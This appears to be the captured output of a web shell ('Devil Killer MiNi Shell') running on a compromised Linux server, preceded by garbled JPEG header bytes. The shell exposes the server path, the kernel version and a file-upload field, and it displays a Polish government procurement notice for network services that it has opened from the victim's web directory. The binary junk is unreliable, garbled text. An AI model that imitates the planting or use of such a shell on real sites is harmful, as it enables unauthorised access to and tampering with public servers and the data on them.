JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250602/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250602/0025895001-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Obsługa sieci i usług sieciowych<br/>Sygnatura postępowania: DAG-WZP.26.1.18.2025.PW </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Główny Inspektorat Ochrony Środowiska</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000861593</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Bitwy Warszawskiej 1920 roku nr 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">02-362</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">p.winnicki@gios.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.gov.pl/gios</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Obsługa sieci i usług sieciowych<br/>Sygnatura postępowania: DAG-WZP.26.1.18.2025.PW </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-84e52ef0-3eb1-44d0-9b6c-fbbf51c2369e</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00258950</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-06-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00158566/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.18 Obsługa sieci i usług sieciowych na okres 24 miesięcy</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zamowienia-gios.ezamawiajacy.pl. <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Postępowanie prowadzone jest w języku polskim za pośrednictwem platformy zakupowej<br/>zamawiającego pod adresem: https://zamowienia-gios.ezamawiajacy.pl.<br/>2. Komunikacja między Zamawiającym a Wykonawcą odbywa się zgodnie z Rozporządzeniem<br/>Prezesa Rady Ministrów z dnia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie<br/>sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o<br/>udzielenie zamówienia publicznego lub konkursie (Dz. U. poz. 2452)<br/>Zgodnie z Rozdziałem XIII SWZ (Techniczne ograniczenia w ogłoszeniu)</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">3. Dokumentacja niniejszego postępowania została opublikowana na platformie zakupowej.<br/>W celu zapoznania się z dokumentacją postępowania Wykonawca po przejściu na<br/>dedykowany adres platformy zakupowej:<br/>- do upływu terminu składania ofert przechodzi do zakładki „Lista ogłoszonych<br/>postępowań”, wybiera zakładkę „Aktualne” i wyszukuje przedmiotowe postępowanie,<br/>- po upływie terminu składania ofert przechodzi do zakładki „Lista ogłoszonych<br/>postępowań”, wybiera zakładkę „Archiwalne” i wyszukuje przedmiotowe postępowanie.<br/>4. Wykonawca przystępując do postępowania o udzielenie zamówienia publicznego<br/>tj. bezpłatnie rejestrując się lub, w przypadku posiadania konta w platformie zakupowej,<br/>logując się, akceptuje regulamin zamieszczony na stronie internetowej:<br/>https://oneplace.marketplanet.pl/regulamin oraz warunki korzystania z platformy zakupowej<br/>wynikające z Instrukcji korzystania z platformy zakupowej Wykonawcy (Instrukcja<br/>użytkownika). Instrukcja dostępna jest pod adresem:<br/>https://zamowienia-<br/>gios.ezamawiajacy.pl/servlet/HomeServlet?MP_module=main&amp;MP_action=publicFilesList&amp;cl<br/>ientName=gios&amp;USER_MENU_HOVER=publicFilesList<br/>W celu wejścia na platformę zakupową umożliwiającą m.in. zapoznanie się z treścią SWZ,<br/>złożenie oferty, wymagane jest uprzednie zalogowanie. Wykonawcy, którzy nie założyli konta,<br/>zobligowani są do uprzedniej, bezpłatnej rejestracji. Szczegóły rejestracji wskazane są w<br/>Instrukcji korzystania z platformy zakupowej. Proces rejestracji trwa maksymalnie do 2 dni<br/>roboczych. Zamawiający zaleca więc Wykonawcom uwzględnienie czasu niezbędnego na<br/>rejestrację w procesie złożenia oferty w postaci elektronicznej.<br/>Ważne – oferta zapisana na platformie zakupowej nie oznacza, że została ona złożona.<br/>Zapisanie oferty daje użytkownikowi czas, na wprowadzenie ewentualnych poprawek,<br/>uzupełnień, dołączenie dodatkowych załączników. Dopiero wybór ikony ZŁÓŻ<br/>OFERTĘ/WNIOSEK oznacza złożenie oferty/wniosku zgodnie z przepisami ustawy Pzp.<br/>5. W prowadzonym postępowaniu wszelkie oświadczenia, wnioski, zawiadomienia oraz<br/>informacje Zamawiający i Wykonawcy przekazują za pomocą platformy zakupowej pod<br/>adresem: https://zamowienia-gios.ezamawiajacy.pl.<br/>6. Wykonawca może zwrócić się do Zamawiającego o wyjaśnienie treści SWZ za pośrednictwem<br/>platformy zakupowej. Treść zapytań wraz z wyjaśnieniami treści SWZ będzie zamieszczana na stronie internetowej Zamawiającego za pośrednictwem platformy zakupowej pod adresem:<br/>https://zamowienia-gios.ezamawiajacy.pl.<br/>7. Oświadczenia, wnioski, zawiadomienia lub informacje, które wpłyną do Zamawiającego,<br/>uważa się za dokumenty złożone w terminie, jeśli ich czytelna treść dotrze do Zamawiającego<br/>przed upływem tego terminu (wczytanie na platformie zakupowej).<br/>8. Za datę wpływu oferty, oświadczeń wniosków, zawiadomień oraz informacji przekazywanych<br/>przez Wykonawcę i Zamawiającego przyjmuje się datę i godzinę wczytania na platformie<br/>zakupowej.<br/>9. Jeśli w niniejszej Specyfikacji Warunków Zamówienia jest mowa o opatrzeniu / podpisaniu<br/>dokumentu / oświadczenia kwalifikowanym podpisem elektronicznym, Zamawiający wymaga,<br/>aby kwalifikowany podpis elektroniczny wystawiony był przez dostawcę kwalifikowanej usługi<br/>zaufania, będącego podmiotem świadczącym usługi certyfikowane – podpis elektroniczny,<br/>spełniające wymogi bezpieczeństwa określone w ustawie z dnia 5 września 2016 r. o usługach<br/>zaufania oraz identyfikacji elektronicznej (Dz. U. z 2024 r. poz. 442). Szczegółowe informacje<br/>o sposobie pozyskania usługi kwalifikowanego podpisu elektronicznego oraz warunkach jej<br/>użycia można znaleźć na stronach internetowych kwalifikowanych dostawców usług zaufania,<br/>których lista znajduje się pod adresem internetowym http://www.nccert.pl.<br/>10. Zamawiający dopuszcza w szczególności następujące formaty danych, dokumentów<br/>i oświadczeń: doc, docx, pdf, xml.1, podpisane kwalifikowalnym podpisem elektronicznym.<br/><br/>Ciąg dalszy zgodnie z rodziałem XIII SWZ - techniczne ograniczenia ogłoszenia</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">I. Klauzula informacyjna dotycząca przetwarzania danych osobowych przez Główny<br/>Inspektorat Ochrony Środowiska w celu wyboru najkorzystniejszej oferty<br/>Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z<br/>dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku<br/>z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych- RODO), (Dz. U. UE.<br/>L. z 2016 r. Nr 119, str. 1 z późn. zm.), podajemy następujące informacje:<br/>1. Administratorem Pani/Pana danych osobowych jest Główny Inspektor Ochrony Środowiska z<br/>siedzibą w Warszawie, z którym może się Pani/Pan kontaktować<br/>w następujący sposób:<br/> listownie na adres siedziby administratora: 02-362 Warszawa, ul. Bitwy Warszawskiej 1920<br/>r. 3;<br/> Elektroniczna Skrzynka Podawcza ePUAP: /gios/SkrytkaESP<br/> telefonicznie na nr 22 577 53 80;<br/> e-mail: gios@gios.gov.pl<br/> adres do doręczeń elektronicznych AE:PL-67072-24050-IURUS-21.<br/>2. Główny Inspektor Ochrony Środowiska wyznaczył Inspektora Ochrony Danych do kontaktu w<br/>sprawach dotyczących przetwarzania danych osobowych oraz realizacji praw związanych z<br/>przetwarzaniem danych, z którym można kontaktować się:<br/> listownie na adres siedziby administratora: 02-362 Warszawa, ul. Bitwy Warszawskiej 1920<br/>r. 3;<br/> telefonicznie na nr 22 577 53 75;<br/> e-mail: iod@gios.gov.pl<br/>3. Podstawą prawną przetwarzania Pani/Pana danych osobowych w szczególności jest:<br/> art. 6 ust. 1 lit. b) RODO t j. przetwarzanie jest niezbędne w celu zawarcia i realizacji umowy<br/>oraz art. 6 ust. 1 lit. c) RODO tj. przetwarzanie jest niezbędne do wypełnienia obowiązku<br/>prawnego ciążącego na administratorze,<br/> ustawa z dnia 10 maja 2018 r. o ochronie danych osobowych (t.j. Dz. U. z 2019 r. poz.<br/>1781),<br/> ustawa z dnia 11 września 2019 r. - Prawo zamówień publicznych (t.j. Dz. U.<br/>z 2024 r. poz. 1320), zwana dalej „ustawą Prawo zamówień publicznych”,<br/> ustawa z dnia 27 sierpnia 2009 r. o finansach publicznych (t.j. Dz. U. z 2024 r. poz. 1530),<br/> ustawa z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2023 r. poz. 120,<br/>z późn. zm.),<br/> ustawa z dnia 23 kwietnia 1964 r. - Kodeks cywilny (Dz. U. z 2024 r. poz. 1061,<br/>z późn. zm.).<br/>4. Pani/Pana dane osobowe będą przetwarzane w celu wyboru najkorzystniejszej oferty<br/>w postępowaniu prowadzonym na podstawie przepisów ustawy Prawo zamówień<br/>publicznych.<br/>5. Odbiorcą Pani/Pana danych osobowych mogą być podmioty upoważnione do przetwarzania<br/>danych osobowych na podstawie przepisów prawa powszechnie obowiązującego, w tym<br/>osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu<br/>o art. 18 oraz art. 74 ustawy Prawo zamówień publicznych. Dodatkowo informacje związane<br/>z postępowaniem są zamieszczane na platformie Marketplanet. W uzasadnionych<br/>przypadkach dane osobowe zostaną przekazane podmiotom, z którymi administrator zawarł<br/>umowę powierzenia przetwarzania danych osobowych w szczególności podmiotom<br/>świadczącym usługi w zakresie systemów informatycznych/ oprogramowania.<br/>6. Pani/Pana dane osobowe będą przechowywane przez okres niezbędny do wykonania<br/>Umowy, celów przetwarzania danych osobowych, dochodzenia roszczeń, obrony przez<br/>roszczeniami oraz wykonania zadań wynikających z ustaw szczególnych, w tym ustawy z dnia<br/>14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach (Dz. U. z 2020 r. poz. 164, z<br/>późn. zm.). 7. Przysługuje Pani/Panu prawo do żądania od administratora: dostępu do danych osobowych,<br/>sprostowania oraz ograniczenia przetwarzania, jeśli nie będą zachodziły przeciwskazania<br/>prawne.<br/>8. W przypadku gdy uzna Pani/Pan, że przetwarzanie danych osobowych narusza przepisy<br/>RODO ma Pani/Pan prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych<br/>Osobowych ul. Stawki 2, 00-193 Warszawa tel. 22 531 03 00 e-mail: kancelaria@uodo.gov.pl.<br/>Zgodnie z rozdziałem XXVI SWZ - techniczne ograniczenia</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">II. RODO (ograniczenia stosowania):<br/>Zamawiający informuje, że:<br/>a) udostępnia dane osobowe, o których mowa w art. 10 RODO (dane osobowe dotyczące wyroków skazujących i czynów zabronionych) w celu umożliwienia korzystania ze środków ochrony prawnej, o których mowa w dziale IX ustawy Pzp, do upływu terminu na ich wniesienie;<br/>b) udostępnianie protokołu i załączników do protokołu ma zastosowanie do wszystkich danych osobowych, z wyjątkiem tych, o których mowa w art. 9 ust. 1 RODO (tj. danych osobowych ujawniających pochodzenie rasowe lub etniczne, poglądy polityczne, przekonania religijne lub światopoglądowe, przynależność do związków zawodowych oraz przetwarzania danych<br/>genetycznych, danych biometrycznych w celu jednoznacznego zidentyfikowania osobyfizycznej lub danych dotyczących zdrowia, seksualności lub orientacji seksualnej tej osoby), zebranych w toku postępowania o udzielenie zamówienia;<br/>c) w przypadku korzystania przez osobę, której dane osobowe są przetwarzane przez Zamawiającego, z uprawnienia, o którym mowa w art. 15 ust. 1–3 RODO (związanych z prawem Wykonawcy do uzyskania od administratora potwierdzenia, czy przetwarzane są dane osobowe jego dotyczące, prawem Wykonawcy do bycia poinformowanym o odpowiednich<br/>zabezpieczeniach, o których mowa w art. 46 RODO, związanych z przekazaniem jego danych osobowych do państwa trzeciego lub organizacji międzynarodowej oraz prawem otrzymania przez Wykonawcę od administratora kopii danych osobowych podlegających przetwarzaniu),<br/>Zamawiający może żądać od osoby występującej z żądaniem wskazania dodatkowych informacji, mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia;<br/>d) skorzystanie przez osobę, której dane osobowe są przetwarzane, z uprawnienia, o którym mowa w art. 16 RODO (uprawnienie do sprostowania lub uzupełnienia danych osobowych),<br/>nie może naruszać integralności protokołu postępowania oraz jego załączników;<br/>e) w postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza<br/>przetwarzania danych osobowych do czasu zakończenia tego postępowania;<br/>f) w przypadku, gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1 RODO spowoduje ograniczenie przetwarzania danych osobowych zawartych w protokole postępowania lub załącznikach do tego protokołu, od dnia zakończenia postępowania o udzielenie zamówienia Zamawiający nie udostępnia tych danych, chyba że zachodzą<br/>przesłanki, o których mowa w art. 18 ust. 2 rozporządzenia 2016/679.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DAG-WZP.26.1.18.2025.PW</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 401520,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa wsparcia w zakresie obsługi sieciowej oraz usług sieciowych GIOŚ<br/>zwanych dalej „Usługą”. Szczegółowy opis przedmiotu zamówienia zawiera osobny Załącznik. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">72700000-7 - Usługi w zakresie sieci komputerowej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-07-01 do 2027-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. W formularzu ofertowym – (w załączniku nr 1 do SWZ) Wykonawca oblicza cenę zamówienia<br/>zgodnie z wytycznymi zawartymi w formularzu ofertowym oraz zgodnie z ust. 2 niniejszego<br/>rozdziału SWZ.<br/>2. Zamawiający poprawi w ofercie oczywiste omyłki rachunkowe zgodnie z wytycznymi<br/>o których mowa w pkt 1)-3) oraz uwzględni konsekwencje rachunkowe dokonanych poprawek<br/>w następujący sposób:<br/>1) w przypadku, gdy Wykonawca poda cenę oferty, wartości brutto z dokładnością większą<br/>niż do dwóch miejsc po przecinku lub dokonał ich nieprawidłowego zaokrąglenia,<br/>Zamawiający dokona przeliczenia podanych w ofercie cen do dwóch miejsc po przecinku,<br/>stosując następująca zasadę: podane w ofercie kwoty zostaną zaokrąglone do pełnych<br/>groszy, przy czym trzecia cyfra po przecinku od 5 w górę powoduje zaokrąglenie drugiej<br/>cyfry po przecinku w górę o 1 grosz. Jeżeli trzecia cyfra po przecinku jest niższa od 5<br/>zostaje pominięta a druga cyfra po przecinku nie ulegnie zmianie.<br/>2) w przypadku sumowania wartości składających się na przedmiot zamówienia – jeżeli<br/>obliczona cena oferty nie odpowiada sumie poszczególnych wartości, Zamawiający<br/>przyjmie, że prawidłowo podano poszczególne wartości za poszczególne pozycje zamówienia.<br/>3) w przypadku mnożenia cen jednostkowych i ilości sztuk – jeżeli obliczona wartość nie<br/>odpowiada iloczynowi ceny jednostkowej oraz ilości sztuk, przyjmuje się, że prawidłowo<br/>podano cenę jednostkową.<br/>3. Wysokość wynagrodzenia brutto musi uwzględniać wszystkie koszty związane z realizacją<br/>przedmiotu zamówienia zgodnie z opisem przedmiotu zamówienia oraz istotnymi<br/>postanowieniami umowy określonymi w SWZ.<br/>4. Cena oferty brutto winna być wyrażona w złotych polskich (PLN). Zamawiający nie<br/>przewiduje rozliczeń w innych obcych walutach.<br/>5. W cenie oferty uwzględnia się zysk Wykonawcy oraz wszystkie wymagane przepisami<br/>podatki i opłaty, a w szczególności podatek VAT.<br/>6. W cenie oferty uwzględnia się podatek od towarów i usług oraz podatek akcyzowy, jeżeli na<br/>podstawie odrębnych przepisów sprzedaż towaru (usługi) podlega obciążeniu podatkiem od<br/>towarów i usług lub podatkiem akcyzowym. Przez cenę rozumie się także stawkę taryfową.<br/>7. Ustalenie prawidłowej stawki podatku VAT / podatku akcyzowego, zgodnej<br/>z obowiązującymi przepisami ustawy o podatku od towarów i usług / podatku akcyzowym,<br/>należy do Wykonawcy.<br/>8. Zamawiający informuje, że w przypadku towarów i usług wymienionych w załączniku nr 15<br/>do ustawy z dnia 11 marca 2004 r. o podatku od towarów i usług (Dz. U. z 2024 r. poz. 361<br/>ze zm.), zgodnie z zapisami w art. 108 a ustawy, podatnicy są obowiązani zastosować<br/>mechanizm podzielonej płatności. (tzw. MPP).<br/>9. Sposób zapłaty i rozliczenia za realizację niniejszego zamówienia, określone zostały<br/>w załączniku nr 7 do SWZ – Projektowane postanowienia umowy.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas realizacji zgłoszenia krytycznego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">25</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Ilość godzin dodatkowych, bezpłatnych w miesiącu w ramach zdalnych prac konfiguracyjnych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span 